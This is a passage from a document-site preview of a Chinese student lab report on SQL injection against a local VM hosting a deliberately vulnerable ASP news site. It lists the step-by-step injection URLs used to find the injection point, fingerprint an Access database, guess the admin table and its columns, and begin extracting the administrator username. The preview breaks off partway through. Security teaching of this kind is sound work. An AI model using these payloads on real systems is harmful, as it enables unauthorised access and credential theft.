sql注入攻擊實驗報告材料

sql注入攻擊實驗報告材料

ID:30278060

大?。?.88 MB

頁數(shù):15頁

時間:2018-12-28

sql注入攻擊實驗報告材料_第1頁
sql注入攻擊實驗報告材料_第2頁
sql注入攻擊實驗報告材料_第3頁
sql注入攻擊實驗報告材料_第4頁
sql注入攻擊實驗報告材料_第5頁
資源描述:

《sql注入攻擊實驗報告材料》由會員上傳分享,免費在線閱讀,更多相關(guān)內(nèi)容在工程資料-天天文庫。

1、實用標準文案實驗報告(實驗名稱:SQL注入攻擊)精彩文檔實用標準文案一、實驗目的通過SQL注入攻擊,掌握網(wǎng)站的工作機制,認識到SQL注入攻擊的防范措施,加強對Web攻擊的防范。二、實驗環(huán)境描述實驗開展所基于的網(wǎng)絡(luò)環(huán)境,給出網(wǎng)絡(luò)拓撲、IP地址、web服務(wù)器、客戶機等信息。宿主機(客戶機):操作系統(tǒng)為Windows10,IP為192.168.18.11,在主機上安裝虛擬化軟件VmwarePlayer,在此基礎(chǔ)上創(chuàng)建虛擬機并安裝操作系統(tǒng),進行網(wǎng)絡(luò)配置,采用環(huán)回適配器,橋接模式,實現(xiàn)宿主機與虛擬機之間的網(wǎng)絡(luò)通信,虛擬機(Web服務(wù)器):操作系統(tǒng)為WindowsXP,IP為192.168.18.9,

2、本實驗利用windows的iis服務(wù)搭建了一個有SQL注入漏洞的網(wǎng)站“ASP新聞發(fā)布系統(tǒng)”,以該網(wǎng)站為目標,對其實施SQL注入攻擊。本實驗所需工具如下:IIS是InternetInformationServer的縮寫,是微軟提供的Internet服務(wù)器軟件,包括Web、FTP、Mail等服務(wù)器,也是目前常用的服務(wù)器軟件。版本不限。“啊D”注入工具:對“MSSQL顯錯模式”、“MSSQL不顯錯模式”、“Access”等數(shù)據(jù)庫都有很好的注入檢測能力,內(nèi)集“跨庫查詢”、“注入點掃描”、“管理入口檢測”、“目錄查看”等等于一身的注入工具包?!癆SP新聞發(fā)布系統(tǒng)”O(jiān)k3wv4.6源碼。三、實驗內(nèi)容(

3、一)配置實驗環(huán)境,首先選擇網(wǎng)絡(luò)適配器,安裝環(huán)回適配器,在主機上安裝VmwarePlayer,成功啟動虛擬機。接著配置宿主機和虛擬機的IP,如圖要注意的是,配置主機上的IP時,應該選擇VMnet8,并且注意勾取Bridge精彩文檔實用標準文案然后,驗證宿主機和虛擬機是否聯(lián)通,結(jié)果顯示連接成功。最后在虛擬機上安裝IIS程序,精彩文檔實用標準文案打開瀏覽器,輸入地址“127.0.0.1”,檢查網(wǎng)站搭建情況。成功!(二)尋找注入點在宿主機上,打開網(wǎng)頁http://192.168.18.9/list.asp?id=95,可以正常打開頁面。進行注入測試,鍵入http://192.168.18.9/li

4、st.asp?id=95and1=1,返回頁面不變。精彩文檔實用標準文案鍵入http://192.168.18.9/list.asp?id=95and1=2,返回頁面出錯。因此,可確定該網(wǎng)站存在注入點。(三)判斷數(shù)據(jù)庫類型用系統(tǒng)表的方法進行判斷,分別鍵入http://192.168.18.9/list.asp?id=95and(selectcount(*)fromsysobjects)>0http://192.168.18.9/list.asp?id=95and(selectcount(*)frommsysobjects)>0精彩文檔實用標準文案兩者返回均出錯,可知是access數(shù)據(jù)庫。

5、精彩文檔實用標準文案(四)猜測表名一般網(wǎng)站后臺的管理員都默認在表admin中,我們先試一下,鍵入:http://192.168.18.9/list.asp?id=95and(selectcount(*)fromadmin)<>0返回頁面正常,可知該網(wǎng)站后臺數(shù)據(jù)庫中存在著表名為admin的表。 (五)猜測字段名不同公司網(wǎng)站有不同的字段名,但一般都有三個字段,分別記錄ID號、用戶名和密碼,常用的字段名為:id,username,password。分別鍵入http://192.168.18.9/list.asp?id=95and(selectcount(id)fromadmin)<>0http:

6、//192.168.18.9/list.asp?id=95and(selectcount(username)fromadmin)<>0http://192.168.18.9/list.asp?id=95and(selectcount(password)fromadmin)<>0三者返回均正常??芍?,表admin中存在的三個字段:id,username,password。注:“username”的截圖損壞,但是返回正常,望教員通融。(六)猜測管理員用戶名和密碼1.確定表admin中有幾條記錄,鍵入http://192.168.18.9/list.asp?id=95and(selectcoun

7、t(*)fromadmin)=1返回頁面正常。精彩文檔實用標準文案可知,表admin只有一條記錄。2.猜測用戶名長度,鍵入http://192.168.18.9/list.asp?id=95and(selectlen(username)fromadmin)=1返回出錯,繼續(xù)鍵入http://192.168.18.9/list.asp?id=95and(selectlen(username)fromadmin)=2返回出錯

當前文檔最多預覽五頁,下載文檔查看全文

此文檔下載收益歸作者所有

當前文檔最多預覽五頁,下載文檔查看全文
溫馨提示:
1. 部分包含數(shù)學公式或PPT動畫的文件,查看預覽時可能會顯示錯亂或異常,文件下載后無此問題,請放心下載。
2. 本文檔由用戶上傳,版權(quán)歸屬用戶,天天文庫負責整理代發(fā)布。如果您對本文檔版權(quán)有爭議請及時聯(lián)系客服。
3. 下載前請仔細閱讀文檔內(nèi)容,確認文檔內(nèi)容符合您的需求后進行下載,若出現(xiàn)內(nèi)容與標題不符可向本站投訴處理。
4. 下載文檔時可能由于網(wǎng)絡(luò)波動等原因無法下載或下載錯誤,付費完成后未能成功下載的用戶請聯(lián)系客服處理。